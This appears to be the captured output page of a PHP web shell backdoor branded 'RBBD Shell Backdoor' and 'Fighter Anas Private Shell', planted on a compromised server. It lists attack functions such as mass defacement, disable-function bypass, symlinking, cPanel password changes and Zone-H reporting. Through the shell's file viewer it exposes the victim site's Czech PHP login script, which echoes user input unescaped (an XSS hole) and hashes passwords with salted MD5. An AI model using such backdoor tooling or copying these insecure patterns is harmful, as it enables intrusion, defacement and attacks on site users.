⚜ RBBD Shell Backdoor ⚜
Current Dir
:
D:
/
php
/
prihlaseni
/
Home
Upload
Command
Config
Jumping
Symlink
Mass Deface
Bypass Disable Function
K-RDP 5H3LL
Adminer
Change Password cPanel
Zone-H
Current File : D:/php/prihlaseni/auth_login.php
<?php do{ require_once('app_header.php'); include('./config/db.php'); // připojení na databázi $tabulka = "uzivatele"; if(!@mysql_connect($server,$user,$password)) {page_mysql(); exit;} if(!@mysql_select_db($databaze)) {page_databaze(); exit;} mysql_query("set names 'utf8'"); /* výpis dat */ if(!$data=mysql_query("select * from $tabulka")) {page_tabulka(); exit;} //http://php.vrana.cz/prihlasovani-uzivatelu.php if (isset($_POST["auth_login"])) { if (mysql_result(mysql_query("SELECT COUNT(*) FROM $tabulka WHERE login = '" . md5(mysql_real_escape_string($_POST["auth_login"]."kelf6fe65f6")) . "' AND heslo = '" . md5($_POST["auth_heslo"]."fghjgtzjjhg") . "'"), 0)) { session_regenerate_id(); // ochrana před Session Fixation $_SESSION["logged"] = true; } } if (!isset($_SESSION["logged"])) { page_header(); //page_footer(); exit; } mysql_close(); }while(false); //cyklus, který se provede jen jednou, ale umožňuje použít break ?> <!doctype html> <html> <head> <title>Hlavní stránky</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="GENERATOR" content="Quanta Plus"> <link rel="stylesheet" href="styl.css" type="text/css"> </head> <body> Text, který se ukáže když správně zadáte jméno a heslo. <?php echo '<p>Přihlásil se uživatel : '.$_POST['auth_login'].'</p>'; //echo var_dump(session_get_cookie_params()); //echo var_dump(session_id()); echo $_SERVER['SERVER_NAME']; ?> </body> </html>
Fighter Anas Private Shell V.1 -
Royal
Battler BD
Copyright © Fighter Anas